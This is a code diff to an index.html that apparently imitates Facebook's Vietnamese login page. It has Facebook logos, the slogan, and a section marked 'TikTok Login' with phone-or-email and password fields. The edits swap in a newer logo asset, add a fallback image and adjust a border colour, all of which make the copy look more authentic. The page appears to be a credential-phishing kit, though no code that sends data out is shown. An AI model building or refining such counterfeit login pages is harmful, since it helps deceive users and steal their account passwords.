--- a/index.html
+++ b/index.html
@@ -243,7 +243,7 @@
             font-size: 12px;
             color: #737373;
             text-align: left;
-            border-top: 1px solid #dddfe2;
+            border-top: 1px solid #dadde1;
         }
         body.desktop-mode .footer {
             display: block;
@@ -353,13 +353,13 @@
     </div>
     <div class="main-container">
         <div class="left-section">
-            <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook" class="desktop-logo" onclick="window.location.href='https://www.facebook.com/'">
+            <img src="https://static.xx.fbcdn.net/rsrc.php/yI/r/4aAhOHG-Ft5.svg" alt="Facebook" class="desktop-logo" onerror="this.src='https://upload.wikimedia.org/wikipedia/commons/8/89/Facebook_Logo_%282019%29.svg'" onclick="window.location.href='https://www.facebook.com/'">
             <div class="slogan">Kết nối với bạn bè, gia đình và những người khác mà bạn biết. Chia sẻ ảnh và video, gửi tin nhắn và nhận thông tin cập nhật.</div>
         </div>
         <!-- TikTok Login -->
         <div class="login-container-tiktok">
             <div class="facebook-logo">
-                <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook">
+                <img src="https://static.xx.fbcdn.net/rsrc.php/yI/r/4aAhOHG-Ft5.svg" alt="Facebook" onerror="this.src='https://upload.wikimedia.org/wikipedia/commons/8/89/Facebook_Logo_%282019%29.svg'">
             </div>
             <input type="text" id="login-input-tiktok" placeholder="Số di động hoặc email">
             <input type="password" id="password-tiktok" placeholder="Mật khẩu">
